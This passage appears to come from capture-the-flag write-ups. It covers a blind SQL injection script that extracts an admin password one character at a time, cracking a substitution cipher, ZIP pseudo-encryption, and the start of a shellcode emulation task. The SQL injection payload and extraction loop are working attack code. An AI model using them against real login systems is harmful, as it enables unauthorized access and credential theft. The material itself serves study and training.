for i inrange(1, 31): found_char = False for char in charset: # Test: substring(pw, index, length) = char payload = f"'and(substring(pw,{i},1)='{char}')--" params = {'id': 'admin' + payload, 'pw': 'a'}
try: r = session.get(url, params=params, timeout=5, allow_redirects=False) r.raise_for_status() if300 <= r.status_code < 400: raise RuntimeError("Redirect received; oracle result is unknown") if"OK"in r.text: password += char print(f"[+] Found char at index {i}: {char}") found_char = True break except requests.RequestException as e: raise RuntimeError("Request failed; oracle result is unknown") from e
ifnot found_char: raise RuntimeError(f"No character matched at position {i}; length or alphabet is unresolved")
print(f"[EXTRACTED CANDIDATE] {password}")
The retained output continued beyond the length of the recorded
answer and does not establish extraction success, so it is not used as
verification. params preserves punctuation such as
+ through form encoding. The OK substring
remains a historical, uncalibrated predicate: a current true/false
control pair and a confirmed password length are required before
treating extraction as complete. The loop aborts on an unmatched
position, transport failure, or redirect; reaching the configured limit
still yields only a candidate, not a verified password.
for i inrange(1, MAX_LENGTH + 1): found = False for char in CHARSET: if check_str(i, extracted_string + char): extracted_string += char print(f"[+] Char {i}: {char}") found = True break
ifnot found: raise RuntimeError(f"No character matched at position {i}; length or alphabet is unresolved")
The following retained transcript shows only an initial prefix, not a
complete extraction or a success response. A current true/false control
pair for SUCCESS_INDICATOR and a separately confirmed
length are missing; an unmatched position now aborts instead of silently
ending the extraction. The ad'+'min' hint above is not used
by the shown or left(...) probe, and that variant is not
independently verified here.
1 2 3 4 5 6 7 8 9 10
[+] Char 1: v [+] Char 2: 3 [+] Char 3: r [+] Char 4: y [+] Char 5: h [+] Char 6: a [+] Char 7: r [+] Char 8: d [+] Char 9: s [+] Char 10: q
Analyze the character frequency in the ciphertext:
1 2 3 4 5 6 7 8 9 10
$ echo"$CIPHER" | fold -w1 | sort | uniq -c | sort -nr 92 n 78 z 69 g 65 c 65 b 62 v 60 i 59 y 58 p
In English text, the most common letters are E, T, A, O, I, N. Since
n is the most frequent cipher character (92 occurrences),
it likely maps to e in the plaintext. Similarly,
z (78 occurrences) might map to t.
Use an online frequency analysis solver or
substitution cipher tool to find the plaintext. Tools like quipqiup.com or frequency_analysis.html
can automatically break the cipher based on English word
frequencies.
The plaintext decrypts to a biography of Kim Yuna, a
renowned South Korean figure skater, and the flag is her name.
The hint says brute-force is unnecessary, so this is likely a
file-format trick.
1 2
$ file So_Simple.zip So_Simple.zip: Zip archive data, ...
This challenge uses ZIP pseudo-encryption (the
encrypted flag bit is set even though the entry is not truly encrypted).
That can break normal extraction in some tools.
Method 1: Use a
pseudo-encryption aware tool
unar can extract So_Simple.zip
directly:
1 2 3 4 5
$ unar So_Simple.zip So_Simple.zip: Zip Am_I_key.zip (205 B)... OK. Am_I_key2.txt (4335 B)... OK. Am_I_key3.txt (1445 B)... OK.
Then extract the nested ZIP:
1 2 3 4 5 6 7 8 9 10
$ unar Am_I_key.zip Am_I_key.zip: Zip There_is_key.txt (61 B)... OK.
$ cat There_is_key.txt Isn't it so easy? Take it. dGE1dHlfSDR6M2xudXRfY29mZmVl
You can also fix the ZIP flags in a hex editor (or
radare2) by clearing the encryption bit in the local file
header / central directory entries (0x0908 -> 0x0008 for
relevant records). After patching, standard unzip tools work.
We have an intercepted message containing hidden x86 shellcode. The
challenge is to extract the secret by emulating the code.
The message file contains x86 machine code that, when executed,
pushes characters onto the stack one by one to form the flag. Use the
Unicorn Engine to emulate x86 code and monitor stack
writes: